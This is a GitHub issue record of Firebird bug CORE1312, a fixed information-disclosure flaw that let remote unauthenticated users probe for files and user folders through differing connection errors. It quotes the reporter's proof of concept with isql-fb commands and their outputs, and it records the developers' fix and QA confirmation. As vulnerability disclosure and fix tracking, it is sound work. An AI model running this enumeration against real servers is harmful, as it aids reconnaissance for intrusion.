New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
A remote attacker can check, if a file is present in the system, running firebird server [CORE1312] #1731
Comments
Commented by: @AlexPeshkoff Now password validation is done as soon as possible - right after getting database options from DPB. This makes 'bad password' first exception to happen when connecting to server, at the same time making it save a lot of job in case of wrong credentials passed. |
Modified by: @AlexPeshkoffstatus: Open [ 1 ] => Resolved [ 5 ] resolution: Fixed [ 1 ] Fix Version: 2.1 Beta 1 [ 10141 ] Fix Version: 2.0.2 [ 10130 ] |
Modified by: @AlexPeshkoffFix Version: 2.1.0 [ 10041 ] Version: 2.1 Alpha 1 [ 10150 ] => Version: 2.1 Initial [ 10160 ] => Version: 1.5.4 [ 10100 ] => Version: 2.0.0 [ 10091 ] => Version: 1.5.3 [ 10028 ] => Version: 1.5.2 [ 10027 ] => Version: 1.5.1 [ 10026 ] => Version: 1.5.0 [ 10025 ] => Version: 1.0.3 [ 10006 ] => Fix Version: 2.1 Beta 1 [ 10141 ] => |
Modified by: @pcisarFix Version: 2.1 Beta 1 [ 10141 ] summary: A remote attacker can check, if a => A remote attacker can check, if a file is present in the system, running firebird server Fix Version: 2.1.0 [ 10041 ] => |
Commented by: @pmakowski Are you sure it is solved ? here what I get under Windows with FB2.1.0Beta1 C:\FB21\bin>isql "192.168.1.10:c:\driver\rappin_ch09.pdf" C:\FB21\bin>isql "192.168.1.10:c:\driver\rappin_ch0.pdf" |
Commented by: @AlexPeshkoff Pavel, this all makes sense only for attempts to connect by users, not having valid login/password on server. I noticed there are no -u/-p switches, but may be you have correct pair in environment? Next, since 2.1 beta1 trusted authentication also works for windows - i.e. you will be connected to a database with your windows logon as CURRENT_USER if you have logged to the windows server. Please try something like: |
Commented by: @pmakowski Sorry Seems I made the bad test If I try to connect from another box, you are right, the bug is solved so I'll close the bug |
Commented by: @pmakowski Q/A test made and ok |
Modified by: @pmakowskistatus: Reopened [ 4 ] => Closed [ 6 ] resolution: Fixed [ 1 ] Fix Version: 2.1 Beta 2 [ 10190 ] |
Modified by: @pcisarWorkflow: jira [ 12286 ] => Firebird [ 14788 ] |
Submitted by: @AlexPeshkoff
Is related to QA132
Bug was reported by David Calligaris <mailto:david.calligaris@emaze.net>:
------------------
There is an information disclosure vulnerability in the Firebird 2.0.1
protocol implementation that could allow a remote attacker to check if a
file is present in the remote system. Successfully exploitation of this
vulnerability allows the remote attacker to launch further attacks on
the remote host.
Proof Of Concept:
-----------------
Example of Windows User Enumeration:
<EXAMPLE>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\diaul"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\diaul"
-Error while trying to open file
-Access is denied.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
diaul@yeshu:~$ isql-fb "192.168.1.75:C:\Documents and Settings\FooBar"
Statement failed, SQLCODE = -902
I/O error for file "C:\Documents and Settings\FooBar"
-Error while trying to open file
-The system cannot find the file specified.
Use CONNECT or CREATE DATABASE to specify a database
SQL>
</EXAMPLE>
You can see there are two different error messages for valid and invalid
resources.
------------------
The reason of a bug is that password validation is done almost in the end of database attach/create calls.
Commits: c76f165 e5f1e63
The text was updated successfully, but these errors were encountered: